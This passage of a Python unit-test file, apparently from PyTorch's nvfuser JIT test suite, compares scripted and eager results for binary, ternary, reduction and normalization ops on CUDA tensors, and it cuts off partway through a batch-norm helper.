category1 = category2 = "ndim"
else:
category1 = category2 = categories
def is_cpu_category(x):
return x == "0dimcpu" or x == "scalar"
# skip unsupported cases
if is_cpu_category(category1) and is_cpu_category(category2):
return
# only test cases with first operand as scalar
if category2 == "scalar":
return
# skip ops that don't support scalar inputs in eager mode
if operation in [
torch.atan2,
torch.max,
torch.min,
torch.remainder, # unsupported in nvfuser
]:
if category1 == "scalar" or category2 == "scalar":
return
if operation in [
torch.fmod,
torch.eq,
torch.ne,
torch.ge,
torch.gt,
torch.le,
torch.lt
]:
if category1 == "scalar":
return
# operators that do not support bfloat16
if operation in [torch.fmod]:
if dtype_arg1 == torch.bfloat16 or dtype_arg2 == torch.bfloat16:
return
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
o = operation(x, y)
o = o + z
return o
shape = (4, 32, 32)
shapex = shape if category1 == "ndim" else ()
shapey = shape if category2 == "ndim" else ()
if random_data:
x = (torch.randn(shapex, dtype=torch.float, device="cuda") * 5).to(dtype_arg1)
y = (torch.randn(shapey, dtype=torch.float, device="cuda") * 5).to(dtype_arg2)
else:
x = self.special_values.to(dtype=dtype_arg1)
y = (torch.rand_like(self.special_values) * 5).to(dtype_arg2)
r"""
Category conversion
"""
has_scalar = False
if category1 == "scalar":
has_scalar = True
x = x.item()
if category1 == "0dimcpu":
x = x.to(device="cpu")
if category2 == "scalar":
has_scalar = True
y = y.item()
if category2 == "0dimcpu":
y = y.to(device="cpu")
z = torch.tensor([2], device="cuda").to(dtype_arg1)
is_dtype_arg1_int = dtype_arg1 == torch.int32 or dtype_arg1 == torch.int64
is_dtype_arg2_int = dtype_arg2 == torch.int32 or dtype_arg2 == torch.int64
if operation in [torch.pow]:
if is_dtype_arg1_int and is_dtype_arg2_int:
if category2 == "scalar":
# RuntimeError: Integers to negative integer powers are not allowed
y = abs(y)
if category2 == "0dimcpu" and y == -1:
# https://github.com/pytorch/pytorch/issues/73196
y = y - 1
if category2 == "0dimcpu" and y == -2:
# avoid pow(0, -2), which gives inconsistent results on integer tensors
y = y - 1
# Avoid division by zero for integer tensors
div_like = [torch.div, torch.fmod, torch.remainder]
if operation in div_like and (dtype_arg2 == torch.int32 or dtype_arg2 == torch.int64):
y[y == 0] = 1
test_value = True
if dtype_arg1 == torch.half or dtype_arg2 == torch.half:
test_value = False
if dtype_arg1 == torch.bfloat16 or dtype_arg2 == torch.bfloat16:
test_value = False
try:
if not has_scalar:
o = t(x, y, z)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
self.assertEqual(o.dtype, jit_o.dtype)
if test_value:
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, z), FUSION_GUARD)
elif category2 != "scalar": # only test the case where first is scalar
test_fn = self._get_scalar_binary_test_fn((category1, dtype_arg1), (category2, dtype_arg2), operation)
o = test_fn(x, y)
t_jit = torch.jit.script(test_fn)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
if test_value:
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y), FUSION_GUARD)
except Exception as e:
print("failing test for op: ", operation.__name__)
print("with input\n\tx: ", x)
print("\ty: ", y)
print("\tz: ", z)
raise e
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_binary_ops(self):
# disabled bf16 / fp16 data types because of accuracy tolerance
data_types = [
torch.int32,
torch.int64,
torch.float16,
torch.float32,
torch.float64
]
if TEST_BF16:
data_types.append(torch.bfloat16)
operations = [torch.mul,
torch.div,
torch.atan2,
torch.max,
torch.min,
torch.pow,
torch.remainder,
torch.fmod,
torch.eq,
torch.ne,
torch.ge,
torch.gt,
torch.le,
torch.lt]
category_types = [
"scalar",
"0dim",
"0dimcpu",
"ndim"
]
binary_dtype_combinations = list(itertools.combinations(data_types, 2))
category_combinations = list(itertools.combinations(category_types, 2))
for op, dtypes, categories in itertools.product(operations, binary_dtype_combinations, category_combinations):
self._binary_test_helper(op, dtypes, True, categories) # random data
for op, dtypes in itertools.product(operations, binary_dtype_combinations):
self._binary_test_helper(op, dtypes, False) # special numbers
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_binary_bitwise(self):
def jit_or(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
return (x & y) | z
def jit_xor(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
return (x & y) ^ z
def jit_lshift(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
return (x & y) << z
def jit_rshift(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
return (x & y) >> z
for jit_func in [jit_or, jit_xor, jit_lshift, jit_rshift]:
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda").mul(5).to(torch.long)
y = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda").mul(5).to(torch.long)
z = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda").mul(2).to(torch.long)
jitted = torch.jit.script(jit_func)
jit_o = jitted(x, y, z)
jit_o = jitted(x, y, z)
o = jit_func(x, y, z)
self.assertEqual(o, jit_o)
self.assertGraphContains(jitted.graph_for(x, y, z), FUSION_GUARD)
# We shouldn't need this redefinition of the function, but otherwise it won't recompile for a new type
def jit_or(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
return (x & y) | z
def jit_xor(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
return (x & y) ^ z
for jit_func in [jit_or, jit_xor]:
x = torch.rand(4, 2, dtype=torch.float, device="cuda").round().to(torch.bool)
y = torch.rand(4, 2, dtype=torch.float, device="cuda").round().to(torch.bool)
z = torch.rand(4, 2, dtype=torch.float, device="cuda").round().to(torch.bool)
jitted = torch.jit.script(jit_func)
jit_o = jitted(x, y, z)
jit_o = jitted(x, y, z)
o = jit_func(x, y, z)
self.assertEqual(o, jit_o)
self.assertGraphContains(jitted.graph_for(x, y, z), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_type_as_op(self):
def t(x: torch.Tensor, y: torch.Tensor, z: float):
o = torch.lt(x, z)
o = o.type_as(y)
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, 0.5)
jit_o = t_jit(x, y, 0.5)
o = t(x, y, 0.5)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, 0.5), FUSION_GUARD)
def _ternary_integer_test_helper(self, dtype_arg1):
shape = (4, 8, 32, 32)
magnitude = 100
if (dtype_arg1 in self.int_types):
x = torch.randint(-magnitude, magnitude, shape, dtype=dtype_arg1, device="cuda")
else:
x = torch.randn(shape, dtype=dtype_arg1, device="cuda") * magnitude
arg2 = int(0)
arg3 = int(magnitude * 0.1)
def clamp0(x: torch.Tensor, f: int):
o = 2. * torch.clamp(x, min=f)
return o
clamp0_jit = torch.jit.script(clamp0)
self._run_helper(clamp0_jit, clamp0, x, arg2)
def clamp1(x: torch.Tensor, f: int, ff: int):
o = 2. * torch.clamp(x, min=f, max=ff)
return o
clamp1_jit = torch.jit.script(clamp1)
self._run_helper(clamp1_jit, clamp1, x, arg2, arg3)
def clamp2(x: torch.Tensor, f: float, ff: int):
o = 2. * torch.clamp(x, min=f, max=ff)
return o
clamp2_jit = torch.jit.script(clamp2)
self._run_helper(clamp2_jit, clamp2, x, float(arg2), arg3)
def clamp3(x: torch.Tensor, f: int, ff: float):
o = 2. * torch.clamp(x, min=f, max=ff)
return o
clamp3_jit = torch.jit.script(clamp3)
self._run_helper(clamp3_jit, clamp3, x, arg2, float(arg3))
def threshold(x: torch.Tensor, th: int, val: int):
o = 2. * torch.threshold(x, th, val)
return o
threshold_jit = torch.jit.script(threshold)
self._run_helper(threshold_jit, threshold, x, arg2, arg3)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_ternary_ops_integer_compatibility(self):
data_types = [
torch.float16,
torch.float32,
torch.float64
]
for dtype in data_types:
self._ternary_integer_test_helper(dtype)
def _ternary_test_helper(self, operation, dtypes, random_data):
if isinstance(dtypes, tuple):
dtype_arg1, dtype_arg2, dtype_arg3 = dtypes
else:
dtype_arg1 = dtype_arg2 = dtype_arg3 = dtypes
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor, alpha: torch.Tensor):
o = operation(x, y, z)
o = o + alpha
return o
shape = (4, 32, 32)
if operation is torch.where:
dtype_arg1 = torch.bool
if random_data:
x = torch.randint(0, 2, shape).to(dtype=torch.bool, device="cuda")
y = (torch.randn(shape, dtype=torch.float, device="cuda") * 5).to(dtype_arg2)
z = (torch.randn(shape, dtype=torch.float, device="cuda") * 5).to(dtype_arg3)
else:
x = torch.randint(0, 2, self.special_values.size()).to(dtype=torch.bool, device="cuda")
y = self.special_values.to(dtype=dtype_arg2)
z = (torch.rand_like(self.special_values) * 5).to(dtype_arg3)
elif random_data:
x = (torch.randn(shape, dtype=torch.float, device="cuda") * 5).to(dtype_arg1)
y = (torch.randn(shape, dtype=torch.float, device="cuda") * 5).to(dtype_arg2)
z = (torch.randn(shape, dtype=torch.float, device="cuda") * 5).to(dtype_arg3)
else:
x = self.special_values.to(dtype=dtype_arg1)
y = (torch.rand_like(self.special_values) * 5).to(dtype_arg2)
z = (torch.rand_like(self.special_values) * 5).to(dtype_arg3)
alpha = torch.tensor([2], device="cuda").to(dtype_arg1)
o = t(x, y, z, alpha)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y, z, alpha)
jit_o = t_jit(x, y, z, alpha)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, z), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_ternary_ops_type_promotion(self):
# TODO: update accuracy tolerance for bf16 / fp16 data types
data_types = [
# torch.float16,
torch.float32,
torch.float64
]
'''
if TEST_BF16:
data_types.append(torch.bfloat16)
'''
# TODO: Add Tensor support for clamp
operations = [torch.clamp]
ternary_dtype_combinations = itertools.combinations(data_types, 3)
for op, dtypes in itertools.product(operations, ternary_dtype_combinations):
self._ternary_test_helper(op, dtypes, True) # random data
self._ternary_test_helper(op, dtypes, False) # special numbers
# We can't test the scalar version of rsub from python
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING, "Requires fusion optimization pass to be effective")
def test_rsub(self):
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
def rsub(x: torch.Tensor, y: torch.Tensor):
o = torch.rsub(x, y)
o = o * 2.
return o
rsub_jit = torch.jit.script(rsub)
self._run_helper(rsub_jit, rsub, x, y)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
# legacy fuser does not work for rand_like, see issue #34361
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING, "Requires fusion optimization pass to be effective")
def test_ternary_ops(self):
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
z = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
cond = torch.randint(0, 2, (4, 8, 32, 32)).to(dtype=torch.bool, device="cuda")
def add(x: torch.Tensor, other: torch.Tensor, alpha: float):
o = torch.relu(x)
o = torch.add(o, other=other, alpha=alpha)
return o
add_jit = torch.jit.script(add)
self._run_helper(add_jit, add, x, y, 2.0)
def clamp0(x: torch.Tensor, f: float):
o = 2. * torch.clamp(x, min=f)
return o
clamp0_jit = torch.jit.script(clamp0)
self._run_helper(clamp0_jit, clamp0, x, 0.5)
def clamp1(x: torch.Tensor, f: float, ff: float):
o = 2. * torch.clamp(x, min=f, max=ff)
return o
clamp1_jit = torch.jit.script(clamp1)
self._run_helper(clamp1_jit, clamp1, x, -0.2, 0.7)
def threshold(x: torch.Tensor, th: float, val: float):
o = 2. * torch.threshold(x, th, val)
return o
threshold_jit = torch.jit.script(threshold)
self._run_helper(threshold_jit, threshold, x, 0.2, 0.9)
def where(x: torch.Tensor, y: torch.Tensor, cond: torch.Tensor):
o = 2. * torch.where(cond, x, y)
return o
where_jit = torch.jit.script(where)
self._run_helper(where_jit, where, x, y, cond)
def lerp(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
o = 2. * torch.lerp(x, y, z)
return o
lerp_jit = torch.jit.script(lerp)
self._run_helper(lerp_jit, lerp, x, y, z)
def lerp_scale(x: torch.Tensor, y: torch.Tensor, z: float):
o = 2. * torch.lerp(x, y, z)
return o
lerp_scale_jit = torch.jit.script(lerp_scale)
self._run_helper(lerp_scale_jit, lerp_scale, x, y, 0.5)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING, "Requires profiling node to run cuda fuser")
def test_addcmul_ops(self):
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
z = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
def addcmul(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor, value: float):
o = torch.add(x, 0.5)
o = torch.addcmul(o, y, z, value=value)
return o
addcmul_jit = torch.jit.script(addcmul)
self._run_helper(addcmul_jit, addcmul, x, y, z, 2.0)
def addcmul_no_alpha(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
o = torch.add(x, 0.5)
o = torch.addcmul(o, y, z)
return o
addcmul_no_alpha_jit = torch.jit.script(addcmul_no_alpha)
self._run_helper(addcmul_no_alpha_jit, addcmul_no_alpha, x, y, z)
def addcmul_const_alpha(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
o = torch.add(x, 0.5)
o = torch.addcmul(o, y, z, value=0.75)
return o
addcmul_const_alpha_jit = torch.jit.script(addcmul_const_alpha)
self._run_helper(addcmul_const_alpha_jit, addcmul_const_alpha, x, y, z)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_dynamic_size(self):
old_guard = torch._C._jit_set_nvfuser_guard_mode(True)
torch._C._jit_set_bailout_depth(20)
def t(x: torch.Tensor, y: torch.Tensor, z: float):
o = x + y
o = o + z
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(32, 32, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, 2.0)
jit_o = t_jit(x, y, 2.0)
o = t(x, y, 2.0)
self.assertEqual(o, jit_o)
subgraph = self._getSubgraphInFusion(t_jit.graph_for(x, y, 2.0))
self.assertGraphContainsExactly(subgraph, 'aten::add', 2, consider_subgraphs=False)
# this test is not ideal: we rely on the bailout to exercise the dynamic
# shape path, and we don't have a way to inspect the bailout graph to
# validate that the proper fusion happened.
x = torch.randn(8, 32, 16, 8, dtype=torch.float, device="cuda")
y = torch.randn(16, 8, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, 2.0)
jit_o = t_jit(x, y, 2.0)
o = t(x, y, 2.0)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, 2.0), FUSION_GUARD)
x = torch.randn(8, 17, 8, dtype=torch.float, device="cuda")
y = torch.randn(8, 17, 1, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, 2.0)
jit_o = t_jit(x, y, 2.0)
o = t(x, y, 2.0)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, 2.0), FUSION_GUARD)
torch._C._jit_set_nvfuser_guard_mode(old_guard)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_random_topo(self):
os.environ["PYTORCH_NVFUSER_DISABLE_FALLBACK"] = "1"
self.assertTrue(runDefaultTestWithSeed(28449))
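# Elementwise comparison helper with a combined rtol/atol tolerance. On a
# mismatch it prints the offending indices, both inputs and the maximum
# difference before returning False, so the caller's assertTrue fails with
# useful context.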
def _compare(self, desc, inp1, inp2, error):
a = inp1.clone()
b = inp2.clone()
close = torch.allclose(a, b, rtol=error, atol=error)
if not close:
print(desc, close)
z = a - b
index = (torch.abs(z) >= error + error * torch.abs(b)).nonzero()
print("dif : ", z[index])
print("inp1 : ", a[index])
print("inp2 : ", b[index])
print("maximum difference", z[index].max())
return close
# Permutation helper that applies a binary operation between two tensors:
# 1. applies separate permutations `perm0` & `perm1` to the two inputs
# 2. reduces dimension `broadcast_axis` of operand two to size 1
# The purpose of this test is to ensure permutation works well in
# complicated cases with arbitrary stride order and broadcasting dimensions
def _permutation_helper(self, sizes, broadcast_axis, dtype, device, perm0, perm1):
def t(x: torch.Tensor, y: torch.Tensor):
o = torch.add(x, y)
o = torch.relu(o)
return o
x = torch.randn([sizes[i] for i in perm0], dtype=dtype, device=device).permute(
[perm0.index(i) for i in range(len(sizes))])
if broadcast_axis >= 0:
sizes[broadcast_axis] = 1
y = torch.randn([sizes[i] for i in perm1], dtype=dtype, device=device).permute(
[perm1.index(i) for i in range(len(sizes))])
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertEqual(o.stride(), jit_o.stride())
self.assertGraphContains(t_jit.graph_for(x, y), FUSION_GUARD)
# end-to-end test of permutation & contiguity handling in integration.
# we test inputs with all combinations of permutation order, just to
# ensure that integration is able to generate functionally correct
# kernels
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_binary_ops_permutation(self):
# b_axis of -1 means no broadcasting; otherwise the corresponding dimension
# of the second operand is shrunk to size 1 (see _permutation_helper)
x = [7, 8, 12]
b_axes = range(-1, len(x))
for b_axis in b_axes:
for perm0 in itertools.permutations(range(len(x))):
for perm1 in itertools.permutations(range(len(x))):
x = [7, 8, 12]
self._permutation_helper(x, b_axis, torch.float32, "cuda", perm0, perm1)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_binary_ops_channels_last_with_bcast(self):
device = "cuda"
x = torch.randn([4, 3, 2, 5], device=device).to(memory_format=torch.channels_last)
w = torch.randn([2, 5], device=device)
def t(x: torch.Tensor, b: torch.Tensor):
o = x + b
return torch.relu(o)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, w)
jit_o = t_jit(x, w)
jit_o = t_jit(x, w)
o = t(x, w)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, 1e-4))
self.assertGraphContains(t_jit.graph_for(x, w), FUSION_GUARD)
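# Helper: adds two (optionally permuted) inputs and reduces over
# `reduction_axis` inside a scripted module, then checks dtype, values
# (within tolerance) and the presence of a fusion guard against eager mode.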
def _reduction_helper(self, sizes, reduction_axis, dtype, device, perm0, perm1, keepdim=False):
class MyReduction(torch.nn.Module):
__constants__ = ['reduction_axis', 'keepdim']
def __init__(self):
super(MyReduction, self).__init__()
self.reduction_axis = reduction_axis
self.keepdim = keepdim
def forward(self, x: torch.Tensor, y: torch.Tensor):
o = torch.add(x, y)
o = torch.sum(o, dim=self.reduction_axis, keepdim=self.keepdim)
return o
t = MyReduction()
x = torch.randn([sizes[i] for i in perm0], dtype=dtype, device=device).permute(
[perm0.index(i) for i in range(len(sizes))])
y = torch.randn([sizes[i] for i in perm1], dtype=dtype, device=device).permute(
[perm1.index(i) for i in range(len(sizes))])
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
# numerical issues here due to our scheduling.
# can't use `self.assertEqual(o, jit_o)`
self.assertTrue(self._compare("comparing output failed", o, jit_o, 1e-4))
self.assertGraphContains(t_jit.graph_for(x, y), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_reduction(self):
for x in ([7, 8, 12], [12, 8, 7, 9, 15], [128, 16, 8, 32]):
# note that num_dim is exclusive from len(x), so we are not reducing
# to single element (codegen limitation at this moment)
for num_reduce_dim in range(1, len(x)):
for axes in itertools.combinations(range(len(x)), num_reduce_dim):
for keepdim in (True, False):
perm0 = range(len(x))
perm1 = range(len(x))
self._reduction_helper(x, axes, torch.float32, "cuda", perm0, perm1, keepdim)
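# Helper for the layer_norm autodiff tests: scripts `model`, runs a few
# profiling/optimization iterations with backward, then compares output and
# input gradients against an eager reference and checks that both the
# forward graph and the backward graph contain a fusion guard.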
def _layer_norm_autodiff_helper(self, model, grad, shapes, args):
jit_model = torch.jit.script(model)
eps = np.random.random() * 1e-4
use_cudnn = bool(np.random.randint(0, 2))
# profile/optimization runs
for i in range(3):
jit_o = jit_model(shapes, *args, eps, use_cudnn)
jit_o.backward(grad)
ref_args = [t.detach().clone().requires_grad_() for t in args]
[t.grad.zero_() for t in args]
jit_o = jit_model(shapes, *args, eps, use_cudnn)
jit_o.backward(grad)
o = model(shapes, *ref_args, eps, use_cudnn)
o.backward(grad)
self.assertEqual(jit_o, o)
for arg, ref_arg in zip(args, ref_args):
self.assertEqual(arg.grad, ref_arg.grad)
# check fusion in fw & bw
g = jit_model.graph_for(shapes, *args, eps, use_cudnn)
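# the loops below simply walk to the last execution plan of the scripted
# model and of its grad executor; this is a roundabout way to get hold of
# the backward graph (v2.graph) for the fusion-guard check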
for node in g.nodes():
n = node
dbg_state = jit_model.get_debug_state()
for val in dbg_state.execution_plans.values():
v = val
state2 = v.code.grad_executor_states()
for val in state2[0].execution_plans.values():
v2 = val
FileCheck().check(FUSION_GUARD).run(g)
FileCheck().check(FUSION_GUARD).run(v2.graph)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_layer_norm_autodiff(self):
def t_wb(shapes: List[int], x, w, b, eps: float, cudnn: bool):
o = torch.layer_norm(x, shapes, w, b, eps, cudnn)
o = torch.relu(o)
return o
def t_w(shapes: List[int], x, w, eps: float, cudnn: bool):
o = torch.layer_norm(x, shapes, w, None, eps, cudnn)
o = torch.relu(o)
return o
def t_b(shapes: List[int], x, b, eps: float, cudnn: bool):
o = torch.layer_norm(x, shapes, None, b, eps, cudnn)
o = torch.relu(o)
return o
def t(shapes: List[int], x, eps: float, cudnn: bool):
o = torch.layer_norm(x, shapes, None, None, eps, cudnn)
o = torch.relu(o)
return o
model = {3: t_wb, 2: t_w, 1: t_b, 0: t}
for w, b in itertools.product([True, False], repeat=2):
batch = [2]
# note: awkward shape here to avoid vectorized fast kernel, which is
# buggy in aten
shapes = [2, 7, 3]
m = model[w * 2 + b]
grad = torch.randn(batch + shapes, dtype=torch.float32, device="cuda")
args = [torch.randn(batch + shapes, dtype=torch.float32, device="cuda").requires_grad_()]
if w:
args.append(torch.randn(shapes, dtype=torch.float32, device="cuda").requires_grad_())
if b:
args.append(torch.randn(shapes, dtype=torch.float32, device="cuda").requires_grad_())
self._layer_norm_autodiff_helper(m, grad, shapes, args)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_layer_norm_parser(self):
dtype = torch.float32
device = "cuda"
x = torch.randn([4, 4, 2], dtype=dtype, device=device)
w = torch.randn([4, 2], dtype=dtype, device=device)
b = torch.randn([4, 2], dtype=dtype, device=device)
def t(x: torch.Tensor, w: torch.Tensor, b: torch.Tensor):
o = torch.relu(x)
o = torch.layer_norm(o, [4, 2], w, b, 1e-5)
return o
o = t(x, w, b)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, w, b)
jit_o = t_jit(x, w, b)
o = t(x, w, b)
self.assertGraphContains(t_jit.graph_for(x, w, b), FUSION_GUARD)
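# Helper: wraps native_layer_norm (with or without affine weight/bias) in a
# scripted module and compares output, mean and rstd against eager within
# `error` tolerance, plus checks for a fusion guard.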
def _native_layer_norm_helper(self, shape, norm_shape, dtype, device, error, affine=True):
class MyLayerNorm(torch.nn.Module):
__constants__ = ['norm_shape']
def __init__(self, elementwise_affine=True):
super(MyLayerNorm, self).__init__()
self.norm_shape = norm_shape
if elementwise_affine:
self.weight = torch.randn(norm_shape, dtype=dtype, device=device)
self.bias = torch.randn(norm_shape, dtype=dtype, device=device)
with torch.no_grad():
self.weight.fill_(1)
self.bias.fill_(0)
else:
self.weight = None
self.bias = None
def forward(self, x: torch.Tensor):
o = torch.relu(x)
o = torch.native_layer_norm(o, self.norm_shape, self.weight, self.bias, 1e-5)
return o
t = MyLayerNorm(affine)
x = torch.randn(shape, dtype=dtype, device=device)
t_jit = torch.jit.script(t)
jit_o, jit_mean, jit_rstd = t_jit(x)
jit_o, jit_mean, jit_rstd = t_jit(x)
o, mean, rstd = t(x)
self.assertEqual(o.dtype, jit_o.dtype)
# numerical issues here due to our scheduling.
# can't use `self.assertEqual(o, jit_o)`
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
self.assertTrue(self._compare("comparing mean failed", mean, jit_mean, error))
self.assertTrue(self._compare("comparing rstd failed", rstd, jit_rstd, error))
self.assertGraphContains(t_jit.graph_for(x), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_native_layer_norm(self):
dims = 4
rnds = 3
for idx in range(rnds):
for offset in range(1, dims):
for affine in (True, False):
input_shape = [random.randint(10, 30) for idx in range(dims)]
norm_shape = [input_shape[idx] for idx in range(dims - offset, dims)]
self._native_layer_norm_helper(input_shape, norm_shape, torch.float32, "cuda", 1e-4, affine)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_native_layer_norm_half(self):
dims = 4
rnds = 3
for idx in range(rnds):
for offset in range(1, dims):
input_shape = [random.randint(10, 30) for idx in range(dims)]
norm_shape = [input_shape[idx] for idx in range(dims - offset, dims)]
self._native_layer_norm_helper(input_shape, norm_shape, torch.float16, "cuda", 5e-3)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
def test_native_layer_norm_bfloat(self):
dims = 4
rnds = 3
for idx in range(rnds):
for offset in range(1, dims):
input_shape = [random.randint(10, 30) for idx in range(dims)]
norm_shape = [input_shape[idx] for idx in range(dims - offset, dims)]
self._native_layer_norm_helper(input_shape, norm_shape, torch.bfloat16, "cuda", 1e-1)
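# Helper shared by the batch_norm / instance_norm tests: runs the chosen
# norm with running stats in training mode, then compares output, stride,
# and the updated running_mean / running_var between eager and the scripted
# version, within `error` tolerance.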
def _norm_helper(self,
shape,
dtype,
device,
error,
is_batch_norm_else_instance_norm,
memory_format=torch.contiguous_format,
*,
layer_dtype=torch.float32):
class MyBatchNorm(torch.nn.Module):
def __init__(self):
super(MyBatchNorm, self).__init__()
def forward(self, x: torch.Tensor, r_mean: torch.Tensor, r_var: torch.Tensor):
o = torch.nn.functional.batch_norm(x, r_mean, r_var, training=True)
o = torch.relu(o)
return o
class MyInstanceNorm(torch.nn.Module):
def __init__(self):
super(MyInstanceNorm, self).__init__()
def forward(self, x: torch.Tensor, r_mean: torch.Tensor, r_var: torch.Tensor):
o = torch.nn.functional.instance_norm(x, r_mean, r_var, use_input_stats=True)
o = torch.relu(o)
return o
t = MyBatchNorm() if is_batch_norm_else_instance_norm else MyInstanceNorm()
x = torch.randn(shape, dtype=dtype, device=device).to(memory_format=memory_format)
running_mean = torch.zeros(shape[1], dtype=layer_dtype, device=device)
running_var = torch.ones(shape[1], dtype=layer_dtype, device=device)
t_jit = torch.jit.script(t)
eager_running_mean = running_mean.clone()
eager_running_var = running_var.clone()
jit_running_mean = running_mean.clone()
jit_running_var = running_var.clone()
